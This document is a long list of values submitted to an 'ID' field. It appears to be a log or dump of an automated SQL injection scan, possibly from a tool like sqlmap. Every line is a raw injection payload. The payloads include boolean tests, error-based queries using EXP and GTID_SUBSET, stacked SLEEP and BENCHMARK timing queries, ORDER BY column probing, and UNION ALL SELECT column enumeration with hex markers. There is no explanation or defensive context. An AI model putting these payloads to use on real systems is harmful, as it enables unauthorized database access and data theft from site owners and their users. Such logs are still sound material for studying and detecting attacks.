ID:1
ID:1
ID:1
ID:1
ID:6860
ID:1()()(.("('
ID:1'WMiAyZ<'">cZsgaZ
ID:1) AND 3760=7253 AND (4174=4174
ID:1) AND 4831=4831 AND (4576=4576
ID:1 AND 1583=8293
ID:1 AND 4831=4831
ID:1 AND 6809=8630-- vtZg
ID:1 AND 4831=4831-- byVa
ID:1') AND 6199=9134 AND ('rVQj'='rVQj
ID:1') AND 4831=4831 AND ('Homp'='Homp
ID:1' AND 1610=5380 AND 'xzKk'='xzKk
ID:1' AND 4831=4831 AND 'cPPO'='cPPO
ID:(SELECT (CASE WHEN (6460=5284) THEN 1 ELSE (SELECT 5284 UNION SELECT 9309) END))
ID:(SELECT (CASE WHEN (5466=5466) THEN 1 ELSE (SELECT 6178 UNION SELECT 1374) END))
ID:(SELECT CONCAT(CONCAT(0x717a717171,(CASE WHEN (5935=5935) THEN 0x31 ELSE 0x30 END)),0x7162716271))
ID:1) AND 1957=3444#
ID:1) AND 6888=6888#
ID:1)) AND 1073=4055#
ID:1)) AND 6888=6888#
ID:1))) AND 1743=3889#
ID:1))) AND 6888=6888#
ID:1 AND 4209=7270#
ID:1 AND 6888=6888#
ID:1)) AS oZGA WHERE 7343=7343 AND 3072=1060#
ID:1)) AS OBWx WHERE 1316=1316 AND 6888=6888#
ID:1) AS hUQd WHERE 8222=8222 AND 8496=1799#
ID:1) AS ckRo WHERE 6388=6388 AND 6888=6888#
ID:1` WHERE 2015=2015 AND 9227=4154#
ID:1` WHERE 3309=3309 AND 6888=6888#
ID:1`) WHERE 5128=5128 AND 2687=3944#
ID:1`) WHERE 9066=9066 AND 6888=6888#
ID:1') AND 5927=1368#
ID:1') AND 6888=6888#
ID:1' AND 5319=1348#
ID:1' AND 6888=6888#
ID:1" AND 4747=7438#
ID:1" AND 6888=6888#
ID:1" AND 1539=6440#
ID:1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a717171,(SELECT (ELT(4152=4152,1))),0x7162716271,0x78))s), 8446744073709551610, 8446744073709551610)))-- MTCJ
ID:1" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a717171,(SELECT (ELT(1201=1201,1))),0x7162716271,0x78))s), 8446744073709551610, 8446744073709551610)))-- JBUE
ID:1" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x717a717171,(SELECT (ELT(9129=9129,1))),0x7162716271,0x78))x))-- CDYg
ID:1" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x717a717171,(SELECT (ELT(8952=8952,1))),0x7162716271,0x78))x))-- UCEw
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT (ELT(4987=4987,1))),0x7162716271),4987)-- lbeA
ID:(SELECT CONCAT(0x717a717171,(ELT(7607=7607,1)),0x7162716271))
ID:1";SELECT SLEEP(5)#
ID:1";SELECT SLEEP(5)-- AiWs
ID:1";(SELECT * FROM (SELECT(SLEEP(5)))YmnA)#
ID:1";(SELECT * FROM (SELECT(SLEEP(5)))mIAx)-- UAvQ
ID:1";SELECT BENCHMARK(5000000,MD5(0x7a4a5468))#
ID:1";SELECT BENCHMARK(5000000,MD5(0x4262574d))-- Vasw
ID:1" AND (SELECT 8033 FROM (SELECT(SLEEP(5)))DEoA)-- BIKd
ID:1" AND (SELECT 8033 FROM (SELECT(SLEEP(0)))DEoA)-- BIKd
ID:1" AND (SELECT 8033 FROM (SELECT(SLEEP(5)))DEoA)-- BIKd
ID:1" ORDER BY 1#
ID:1" ORDER BY 7878#
ID:1" ORDER BY 10#
ID:1" ORDER BY 6#
ID:1" ORDER BY 4#
ID:1" ORDER BY 3#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x4873684a714b4661646f6d6b524f7a54747747567146505379447659484b49735845437866756245,0x7162716271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x6750555158584476775a716841534f464e524b4a43615876575177496177496747524b546f516c74,0x7162716271)#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x4f457271634f57726f6166667171714742705063635a6f4b797443666e74537142736c6f5953454d,0x7162716271),NULL#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x6d6a616351454749634b,0x7162716271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x774561766b6b4e6a5471,0x7162716271)#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x726f4972574a79594552,0x7162716271),NULL#
ID:-4252" UNION ALL SELECT CONCAT(0x717a717171,0x62694c756d414f6d7a6350415853436d4d456a7449436c79556c6741766a4e745145676b4f78554a,0x7162716271),NULL,NULL#
ID:-4644" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x695a784f574255466c586b62797072737973597063794a4946494f656472574e4874726965434578,0x7162716271)#
ID:-8181" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x58656f73696467575673586e52687a7955634b58776f63784d6941556365694956735374476c6351,0x7162716271),NULL#
ID:-7032" UNION ALL SELECT CONCAT(0x717a717171,0x5346475a4d7052675875,0x7162716271),NULL,NULL#
ID:-7108" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x52484b504f4a6d767a65,0x7162716271)#
ID:-9692" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x4f55646e484f68504765,0x7162716271),NULL#
ID:1" UNION ALL SELECT 50,CONCAT(0x717a717171,0x6d4c64434e65644c66707053735a70706e47416270587548776247724f73644e6c546f4569597667,0x7162716271),50#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x4e667a754c5867755752504a416e4d55796e4b47646e71636b716b5963754b4f59435742476c4e63,0x7162716271),50,50#
ID:1" UNION ALL SELECT 50,50,CONCAT(0x717a717171,0x424b58576b70644f57675674764578484755647a706e6b6d67557957737564596d46674c6642626c,0x7162716271)#
ID:1" UNION ALL SELECT 50,CONCAT(0x717a717171,0x56414e5853414f704c49,0x7162716271),50#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x74654b75736e71485261,0x7162716271),50,50#
ID:1" UNION ALL SELECT 50,50,CONCAT(0x717a717171,0x795659455a5174544559,0x7162716271)#
ID:-6951" UNION ALL SELECT 50,50,CONCAT(0x717a717171,0x78685252425a444c7746416b78536a635646494454617371666b507a6a6551794667684742747773,0x7162716271)#
ID:-9266" UNION ALL SELECT CONCAT(0x717a717171,0x434947574a70546a4c414f6f735a566150735575716b59475476656249796969586a7747556f7442,0x7162716271),50,50#
ID:-8997" UNION ALL SELECT 50,CONCAT(0x717a717171,0x76576c785150435672667a4e446b6a7476417347506770617a61594958585356794a424e6e454c74,0x7162716271),50#
ID:-6376" UNION ALL SELECT 50,50,CONCAT(0x717a717171,0x6944514d487673746b45,0x7162716271)#
ID:-2149" UNION ALL SELECT CONCAT(0x717a717171,0x48467564534f6d544e54,0x7162716271),50,50#
ID:-8730" UNION ALL SELECT 50,CONCAT(0x717a717171,0x434577794e5a4a554b6e,0x7162716271),50#
ID:1" UNION ALL SELECT NULL#
ID:1" UNION ALL SELECT NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x6b786379484d7461795859754467625051615477586e48467777627a696574756f4d7441727a614c,0x7162716271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x6c444a4b674453624e61436852416f7779776e4e6a567a43534768536d416a72586b735265564877,0x7162716271),NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x6678505855776a51655343687459564f6c745057664a50714e777a784267487746614359575a554e,0x7162716271)#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x426c5849576b51527644,0x7162716271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x65477162564f5473714e,0x7162716271),NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x6d63597845566753746a,0x7162716271)#
ID:-9528" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x594b704463494857486943654d584d5452707153677a676b65416751707441774370426150415271,0x7162716271)#
ID:-7100" UNION ALL SELECT CONCAT(0x717a717171,0x4364706272504567675466444f506c6b7250497a644a4a46436e6a564f5565764561564a6a446568,0x7162716271),NULL,NULL#
ID:-7576" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x65535174686a7847666f5070525755434a5071554f7751786c66506156594378656d746249547a56,0x7162716271),NULL#
ID:-4469" UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x51506d7364634e4c767a,0x7162716271)#
ID:-9752" UNION ALL SELECT CONCAT(0x717a717171,0x4d657266704665726446,0x7162716271),NULL,NULL#
ID:-2088" UNION ALL SELECT NULL,CONCAT(0x717a717171,0x584c6d5a677270725250,0x7162716271),NULL#
ID:1" UNION ALL SELECT 11,CONCAT(0x717a717171,0x6464534b63664c4a74686a4a667663734c4c6150475644747a70766158554d784558646b43484863,0x7162716271),11#
ID:1" UNION ALL SELECT 11,11,CONCAT(0x717a717171,0x4f684752746355696b6471436149485a68546459565a5550714c664543586c6d674d68576d746e54,0x7162716271)#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x764d557447774452796d617a7546414d43554363504a4a717764794d45685075706541595172496c,0x7162716271),11,11#
ID:1" UNION ALL SELECT 11,CONCAT(0x717a717171,0x7661535a496879717944,0x7162716271),11#
ID:1" UNION ALL SELECT 11,11,CONCAT(0x717a717171,0x73526342567756704b48,0x7162716271)#
ID:1" UNION ALL SELECT CONCAT(0x717a717171,0x6d59617a696678465666,0x7162716271),11,11#
ID:-7398" UNION ALL SELECT CONCAT(0x717a717171,0x45774269566a765a5750765251726f6667504c4b577547526472724a5445435a516c485866426168,0x7162716271),11,11#
ID:-3733" UNION ALL SELECT 11,11,CONCAT(0x717a717171,0x78595976487049777a5353635447775477437977506f4d4170714b506f50507766684a5348734965,0x7162716271)#
ID:-9258" UNION ALL SELECT 11,CONCAT(0x717a717171,0x6d6663424d53487274675655626351544b50466452684e797a706d646e7464745877456c6347767a,0x7162716271),11#
ID:-6046" UNION ALL SELECT CONCAT(0x717a717171,0x6177436963626e4a7a45,0x7162716271),11,11#
ID:-1995" UNION ALL SELECT 11,11,CONCAT(0x717a717171,0x6851437750484f744d57,0x7162716271)#
ID:-5307" UNION ALL SELECT 11,CONCAT(0x717a717171,0x79424f54524978666e53,0x7162716271),11#
ID:-1901" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-4308" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2555" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7536" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1031" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7267" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3249" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1997" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8368" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9438" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3614" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8627" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1359" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-5808" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9175" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-5384" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1246" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-4983" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-5135" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7752" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1264" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9262" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-4308" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-4227" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1582" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2144" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1503" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9467" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2388" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3675" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-6849" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7591" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9702" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8554" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2067" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9919" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2425" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2813" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1920" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-6841" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3517" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-6468" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-6471" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7392" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3063" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8056" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7571" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3394" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3241" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7073" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-6945" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7445" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-4445" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-6604" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2911" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3058" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8441" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8820" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8126" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9780" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9241" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7374" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9977" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7301" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3661" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-9769" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1843" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
